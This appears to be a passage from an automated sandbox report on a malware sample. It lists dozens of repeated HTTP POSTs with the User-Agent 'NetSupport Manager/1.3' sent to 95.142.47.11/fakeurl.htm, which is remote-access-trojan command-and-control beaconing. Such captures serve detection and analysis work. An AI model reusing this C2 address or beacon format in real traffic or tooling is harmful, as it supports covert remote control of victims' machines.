                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.886781931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.987037897 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.087734938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.187922001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.288927078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.388742924 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.489737988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.589751005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.689806938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.790746927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.891726017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:47.992036104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.092710018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.192764997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.293761969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.396030903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.497771978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.598807096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.699055910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.799927950 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:48.899723053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.000730991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.100725889 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.201771975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.302021027 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.402743101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.502770901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.603782892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.704736948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.805718899 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:49.906724930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.006751060 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.106998920 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.207081079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.307854891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.408752918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.509377003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.610784054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.710717916 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.811882019 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:50.911712885 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.012737989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.113138914 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.213753939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.314709902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.414701939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.514924049 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.614953995 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.714931011 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.816067934 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:51.916676044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.016700029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.116760969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.216727018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.317847967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.417879105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.518785000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.620742083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.720968962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.822746038 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:52.923707008 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.024703979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.125720978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.225725889 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.326128006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.426719904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.527704000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.628902912 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.728760958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.829761982 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:53.930717945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
